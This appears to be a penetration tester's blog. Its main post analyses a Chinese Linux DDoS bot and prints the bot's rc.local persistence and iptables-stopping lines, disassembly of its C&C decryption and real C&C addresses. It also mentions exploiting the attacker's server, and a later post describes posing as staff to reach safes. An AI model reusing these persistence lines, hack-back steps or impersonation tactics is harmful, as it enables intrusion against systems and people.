what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Sunday, October 26, 2014

CHINA ELFs

Its been a while since i posted, been crazy busy, but this coming month, i will set up some time, for just blogging.

A few months ago, we were testing an KE Govt office, that was complaining of high attacks which they didn't understand and they couldn't find it, since it was Linux based. And as you know GOK has less capacity as far as Cyber Crime and Cyber Warfare is concerned. So during our tests, we landed on Linux.DDoS.22.

During Penetration Tests, we get to find a lot, and i can assure you, not only CyberWarfare in EAfrica, there alot of Cyber Espionage attacks and Cyber Terror happening right now.

Linux.DDoS.22 is Chinese ELF, that is used for DDOS attacks on unaware infrastuctures around the world. The attackers install the ELF as pktmake which you will find in /bin in your Linux servers and it modifies your /etc/rc.local for automatic restarts like below:

cat /etc/rc.local
#!/bin/sh -e
/root/task1 reboot
/root/server reboot
/root/guchun26 reboot


It will even stop the iptables as follows on rc.local:

cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
/bin/cmds start



During our reverse engineering and forensics outputs we realized the elf was collecting information about the infected box, hardware, processor information, amount of memory, and is sent to some Chinese crooks via encrypted communication to a C&C.

The C&C is usually hard-coded on the source code, but the Chinese use mathematics formulas to hide the information and its up to the forensics engineers to find that information via Reversing Engineering, Counter Cyber Intelligence and Covert Data Acquisitions.

One of the IPs can be found with common checks by use of lsof as below

pktmake    1355    root    3u  IPv4   9964      0t0  TCP REDACTED.xx.ke:36811->23.234.50.32:37368 (ESTABLISHED)

With reverse engineering we were able to find other IPs from china that were used to upload logs and update the box, but the above machine if hacked, could find more intel about the main C&C and thats what we were after.

An nmap scan on the box showed us this:

Nmap scan report for 23.234.50.32
Host is up (0.32s latency).
Not shown: 65305 closed ports, 44 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http-proxy    Squid http proxy 2.7.STABLE4
89/tcp    open  http          Microsoft IIS httpd
1025/tcp  open  msrpc         Microsoft Windows RPC
3306/tcp  open  mysql         MySQL (unauthorized)
5918/tcp  open  ms-wbt-server Microsoft Terminal Service
37368/tcp open  unknown


So, i am not going to go deep into how this Chinese Box was exploited, but after a couple of Reverse engineering the ELFs:

/bin/pktmake: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

We found other ELFs that had great associations with the major ELF.

file /bin/cmds
/bin/cmds: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, not stripped

file /root/guchun26
/root/guchun26: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped



And these were the files used to compile:


crtstuff.c
main.cpp
DNS.cpp
AttackLogic.cpp
Iattack.cpp
info.cpp
Lock.cpp
SYN.cpp
TaskManager.cpp
TCP.cpp
TcpClient.cpp
Thread.cpp
UDP.cpp
utils.cpp
CC.cpp
rc4.c

The first initial part was to find pieces of code on how the elf was connecting to the C&C and how we would find all the other Boxes they were using for initial attacks.

_v2072 = ">>>>>>>>>>> in net wrok thread";
     *__esp = 135652608;
    _t31 = __ebx->basic_ostream& , 5, char * )(__edi, __esi);
    _v2072 = 134746416;
     *__esp = _t31;
    L0807EF10();
    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
    while(( *(_a4 + 100) & 255 ^ 1) != 0) {
        _t39 = _a4 + 560->c_str(void )();
        _v2068 = 37368;
        _v2072 = _t39;
         *__esp = _a4 + 60;
        if((_t39->Connect(char * , unsigned int )() ^ 1) == 0) {
            if((L08049C60(_a4, _a4) ^ 1) == 0) {
                while(( *(_a4 + 100) & 255 ^ 1) != 0) {
                    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
                    if((L0805223E( ?_? ( &_v2052), _a4 + 60,  &_v2052) ^ 1) != 0) {


Thats when we started to understand the mathematics formula used by the intruder.
Alright, some Segment mapping:

  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

A lot of Chinese Lang on the source code

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG
0x0075693  B4CUNG
0x0102520  i18n:1999
 
 
A file called fake.cfg had some juicy information,


0
YOUR-IP-HERE:AND-HERE
10000:60000
 
 
getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0

Also they were doing test connections by use of www.baidu.com, to see if its reachable once the ELF is installed.

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74


DDOS functionality was actually on a file called ThreadAttack.cpp, this was interesting, cause this is where we realized we might catch the main Chinese C&C server.
0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
  0x805478Apublic _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
  0x805478A_ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
  0x805478A push ebp
  0x805478B mov  ebp, esp
  0x805478D leave
  0x805478E retn
  0x805478E
  0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
 
  0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
  0x8054790public _ZN13CThreadAttack7HttpAtkER8CSubTask
  0x8054790_ZN13CThreadAttack7HttpAtkER8CSubTask proc near
  0x8054790 push ebp
  0x8054791 mov  ebp, esp
  0x8054793 leave
  0x8054794 retn
  0x8054794
  0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
 
  0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
  0x8054796public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
  0x8054796_ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
  0x8054796 push ebp
  0x8054797 mov  ebp, esp
  0x8054799 leave
  0x805479A retn
  0x805479A
  0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
  0x80532D2 sub  esp, 214h ; Integer Subtraction
  0x80532D8 lea  ecx, [ebp+var_10C] ; Load Effective Address
  0x80532DE mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
  0x80532E3 mov  eax, 100h
  0x80532E8 sub  esp, 4  ; Integer Subtraction
  0x80532EB push eax
  0x80532EC push edx
  0x80532ED push ecx
  0x80532EE call memcpy  ; Call Procedure
  0x80532F3 add  esp, 10h; Add
  0x80532F6 lea  ecx, [ebp+var_20C] ; Load Effective Address
  0x80532FC mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
  0x8053301 mov  eax, 100h
  0x8053306 sub  esp, 4  ; Integer Subtraction
  0x8053309 push eax
  0x805330A push edx
  0x805330B push ecx
  0x805330C call memcpy  ; Call Procedure
  0x8053311 add  esp, 10h; Add
  0x8053314 push 27h
  0x8053316 push offset a7005601212 ; "70/056/012/12"  ; <============================
  0x805331B push 0FFh
  0x8053320 lea  eax, [ebp+var_10C] ; Load Effective Address
  0x8053326 push eax
  0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x805332C add  esp, 10h; Add
  0x805332F push 0Ah
  0x8053331 push offset a63551; "63551" ; <============================
  0x8053336 push 0FFh
  0x805333B lea  eax, [ebp+var_20C] ; Load Effective Address
  0x8053341 push eax
  0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const

So far we had the formula, now it was all about getting down to crack the code on C&C information.
0x8062EF0
  0x8062EF0 ; CUtility::DeCrypt(char *, int, char  const*, int)
  0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
  0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near  ; CODE XREF: CServerIP::Initialize(void)
  0x8062EF0 ; CServerIP::Initialize(void)
  0x8062EF0
  0x8062EF0 var_4= dword ptr -4
  0x8062EF0 arg_0= dword ptr  8
  0x8062EF0 arg_4= dword ptr  0Ch
  0x8062EF0 arg_8= dword ptr  10h
  0x8062EF0 arg_C= dword ptr  14h
  0x8062EF0
  0x8062EF0 push ebp
  0x8062EF1 mov  ebp, esp
  0x8062EF3 sub  esp, 10h; Integer Subtraction
  0x8062EF6 mov  [ebp+var_4], 0
  0x8062EFD jmp  short loc_8062F36 ; Jump
  0x8062EFD
  0x8062EFF
  0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062EFF mov  eax, [ebp+var_4]
  0x8062F02 and  eax, 1  ; Logical AND
  0x8062F05 test al, al  ; Logical Compare
  0x8062F07 jzshort loc_8062F1E ; Jump if Zero (ZF=1)
  0x8062F07
  0x8062F09 mov  eax, [ebp+var_4]
  0x8062F0C mov  edx, eax
  0x8062F0E add  edx, [ebp+arg_0] ; Add
  0x8062F11 mov  eax, [ebp+var_4]
  0x8062F14 add  eax, [ebp+arg_8] ; Add
  0x8062F17 mov  al, [eax]
  0x8062F19 inc  eax  ; Increment by 1
  0x8062F1A mov  [edx], al
  0x8062F1C jmp  short loc_8062F31 ; Jump
  0x8062F1C
  0x8062F1E
  0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F1E mov  eax, [ebp+var_4]
  0x8062F21 mov  edx, eax
  0x8062F23 add  edx, [ebp+arg_0] ; Add
  0x8062F26 mov  eax, [ebp+var_4]
  0x8062F29 add  eax, [ebp+arg_8] ; Add
  0x8062F2C mov  al, [eax]
  0x8062F2E dec  eax  ; Decrement by 1
  0x8062F2F mov  [edx], al
  0x8062F2F
  0x8062F31
  0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F31 lea  eax, [ebp+var_4] ; Load Effective Address
  0x8062F34 inc  dword ptr [eax] ; Increment by 1
  0x8062F34
  0x8062F36
  0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F36 mov  eax, [ebp+var_4]
  0x8062F39 cmp  eax, [ebp+arg_C] ; Compare Two Operands
  0x8062F3C jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F3C
  0x8062F3E mov  eax, [ebp+var_4]
  0x8062F41 cmp  eax, [ebp+arg_4] ; Compare Two Operands
  0x8062F44 jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F44
  0x8062F46 mov  eax, [ebp+var_4]
  0x8062F49 add  eax, [ebp+arg_8] ; Add
  0x8062F4C mov  al, [eax]
  0x8062F4E test al, al  ; Logical Compare
  0x8062F50 jnz  short loc_8062EFF ; Jump if Not Zero (ZF=0)
  0x8062F50
  0x8062F52
  0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 leave; High Level Procedure Exit
  0x8062F53 retn ; Return Near from Procedure
  0x8062F53
  0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
  0x8062F53

And this decoded the main C&C as 61.147.103.21:54460

This CnC Server also hosted the binaries to update the small operational botnets on HFS app.











One of the machines we caught, that was used to manipulate the L.A. Chinese Bot Server, was 220.191.230.250
Now do some research on that, and tell me if you know who those are.


Wednesday, July 02, 2014

MYTHS ON BIOMETRICS

Myth: Iris recognition devices use lasers to scan your eyes,

Reality: Iris recognition cameras take a black and white picture and use non-invasive near-infrared illumination that is barely visible and very safe.

Myth: "Stolen" body parts can be used to fool the system.

Reality: Quality biometric recording and detection systems can determine "liveness" in order to prevent tis type of fraud.

Myth: Identical twins can fool the system.

Reality: If the system is poorly configured, then this is possible, though can be eradicated during during a White Box Penetration Testing. Good systems will highlight a false match, which will require human intervention to complete the identification process.

Myth: Biometrics will get rid of the evil in our world.

Reality: Identity Management systems cannot perform miracles.


Continue doing real Penetration Testing, and lets secure facilities for real.

Wednesday, June 25, 2014

WHY DO PEOPLE STILL CODE IN BIRTHDAYS



Safes are hard to break, they say, but as long as the Safe is used by a human being and build by one, its not a Safe 100% anymore

Sometime during Pentests we get to go Face Off with these machines and with enough intel we know what is behind that door is vital to what we are after. A lot of testers don't think this way, but as experience grows in this field, you get to learn that this is necessary strategy in Real Life types of Pentest like Blackbox. Now getting to where the safe is, is always a problem, it may require you to go through a lot of hoops, e.g as a Janitor, well during this operation, i acted as Network Support.

IT People have inclusive access to executive office, have you ever seen how an office boss get soo happy when you fix a MS Windows problem that had bothered them for a while.
"Now i can watch new movies?"
"Yes ma'am"
"Even the new ones that i couldn't before"
"Yes, i can copy for you more if you want to"
"Go ahead, Go ahead Chuck"

So one thing i have come to find is the use of digits as key codes, and personnels love using numbers they can remember, even i have that vulnerability on such authentication, e.g SIM Pin numbers, MBanking etc. The easiest digits people remember all their life even when suffering from Old Timers are birthdays. And a lot of users will simply use these on a Safe, now the problem as Pentesters is not being in a position to do enough research on target employees online, e.g Social Media and Online Security Assessment.

Surveillance and Recovery Assessment is essential for such intrusions in a great way and this is done in teams. You might find that you get a lot of access to a facility just through this kind of assessment. Am currently doing a Pentest which is similar to this, and i started as a Janitor, its amazing that the employees wont ask who you are as long as you are serving them or cleaning their desks.

Employees and senior management need to understand that security starts with everyone, not the ICT Department thrown at corner cubicle and paid peanuts.

So most safes are used for storage of money but others store confidential documents. The personnel dealing with these documents need to have that sense of security, especially with their surroundings and who has access to their office. Sometimes these Safes might have information about the whole infrastructure and other company secrets that can seriously damage the organization.

When buying a safe, its important to understand the tough ones, and the value it will add to the company as far as Security is concerned.

So whenever you hire an Security Firm for a Blackbox Penetration and they are just doing perimeter scans, just know these are the consultants we call Script Kiddles and they are not in anyway helping you to secure your Infrastructure.